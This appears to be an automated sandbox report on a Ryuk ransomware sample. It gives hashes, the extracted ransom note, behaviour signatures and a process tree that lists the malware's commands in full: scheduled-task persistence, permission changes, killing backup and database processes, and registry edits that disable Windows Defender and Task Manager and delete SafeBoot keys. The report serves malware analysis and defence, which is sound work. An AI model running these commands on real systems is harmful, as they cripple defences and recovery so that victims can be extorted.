Analysis

  • max time kernel
    47s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-03-2023 18:31

General

  • Target

    Ryuk86.bin.exe

  • Size

    767KB

  • MD5

    d2e194259106bca3b42dc8690d340b59

  • SHA1

    edcd63a3125854ed72cb5811f08644a87e265e3b

  • SHA256

    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

  • SHA512

    4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

  • SSDEEP

    12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Disables Task Manager via registry modification
  • Drops startup file (3 IoCs)
  • Modifies file permissions (1 TTPs, 1 IoCs)
  • Enumerates connected drives (3 TTPs, 24 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory (64 IoCs)
  • Drops file in Windows directory (2 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) (1 TTPs, 4 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill (2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)
  • Views/modifies file attributes (1 TTPs, 3 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:932
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:916
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      PID:1708
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:568
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        3⤵
        • Creates scheduled task(s)
        PID:968
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:472
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        3⤵
        • Drops startup file
        • Views/modifies file attributes
        PID:1328
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:524
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:684
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F
        3⤵
        • Creates scheduled task(s)
        PID:1320
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h +s ryuk.exe
        3⤵
        • Views/modifies file attributes
        PID:1240
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:984
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      2⤵
      PID:812
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        3⤵
        PID:696
        • C:\Windows\SysWOW64\icacls.exe
          icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          4⤵
          • Modifies file permissions
          PID:604
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      2⤵
      PID:556
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
        3⤵
        PID:1356
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
      2⤵
      PID:936
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
      2⤵
      PID:828
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
      2⤵
      PID:1640
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
      2⤵
      PID:1500
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
      2⤵
      PID:1504
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
      2⤵
      PID:1728
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      PID:1156
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        PID:1708
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      PID:768
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        PID:1164
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
      2⤵
      PID:1580
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
        3⤵
        PID:1616
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
      2⤵
      PID:1704
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
        3⤵
        PID:560
  • C:\Windows\SysWOW64\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    1⤵
    • Views/modifies file attributes
    PID:948
  • C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /t /im veeam*
    1⤵
    • Kills process with taskkill
    • Suspicious use of AdjustPrivilegeToken
    PID:1544
  • C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    1⤵
    PID:1248
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /t /f /im sql*
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:612

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html
    Filesize
    152B
    MD5
    a641bf8ac8307aad57ecab53872e67db
    SHA1
    6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
    SHA256
    9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
    SHA512
    7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt
    Filesize
    1KB
    MD5
    f69127370e1f1aede86e881dd446f6aa
    SHA1
    65298f80e3b97f59ea45179463ab9c5cc3ee9337
    SHA256
    da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
    SHA512
    5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
    Filesize
    767KB
    MD5
    d2e194259106bca3b42dc8690d340b59
    SHA1
    edcd63a3125854ed72cb5811f08644a87e265e3b
    SHA256
    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
    SHA512
    4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

  • C:\ProgramData\RYUKID
    Filesize
    8B
    MD5
    bea6ddd31c498e9f4e9f6bc95923ee3e
    SHA1
    0cfd17881260146fb9417dbf9694fa6ef2211105
    SHA256
    8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5
    SHA512
    910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

  • C:\ProgramData\RyukReadMe.txt
    Filesize
    1KB
    MD5
    f69127370e1f1aede86e881dd446f6aa
    SHA1
    65298f80e3b97f59ea45179463ab9c5cc3ee9337
    SHA256
    da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
    SHA512
    5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

  • C:\ProgramData\hrmlog1
    Filesize
    2KB
    MD5
    d9876c40c0deeed3a19a371bdc127213
    SHA1
    86c2e629e33a29ef280896b6415186c119e211e3
    SHA256
    7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
    SHA512
    00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

  • C:\ProgramData\hrmlog2
    Filesize
    292B
    MD5
    f3642fa051609bd3e193a24379b547ec
    SHA1
    920dca74fd4c08cc17cadf3d7a5169f201296075
    SHA256
    580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
    SHA512
    24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

  • C:\ProgramData\ryuk.exe
    Filesize
    767KB
    MD5
    d2e194259106bca3b42dc8690d340b59
    SHA1
    edcd63a3125854ed72cb5811f08644a87e265e3b
    SHA256
    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
    SHA512
    4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

  • C:\Users\Admin\AppData\Local\Temp\RYUKID
    Filesize
    8B
    MD5
    bea6ddd31c498e9f4e9f6bc95923ee3e
    SHA1
    0cfd17881260146fb9417dbf9694fa6ef2211105
    SHA256
    8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5
    SHA512
    910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

  • C:\Users\Admin\AppData\Local\Temp\hrmlog1
    Filesize
    2KB
    MD5
    d9876c40c0deeed3a19a371bdc127213
    SHA1
    86c2e629e33a29ef280896b6415186c119e211e3
    SHA256
    7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
    SHA512
    00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

  • C:\Users\Admin\AppData\Local\Temp\hrmlog2
    Filesize
    292B
    MD5
    f3642fa051609bd3e193a24379b547ec
    SHA1
    920dca74fd4c08cc17cadf3d7a5169f201296075
    SHA256
    580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
    SHA512
    24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
    Filesize
    767KB
    MD5
    d2e194259106bca3b42dc8690d340b59
    SHA1
    edcd63a3125854ed72cb5811f08644a87e265e3b
    SHA256
    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
    SHA512
    4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13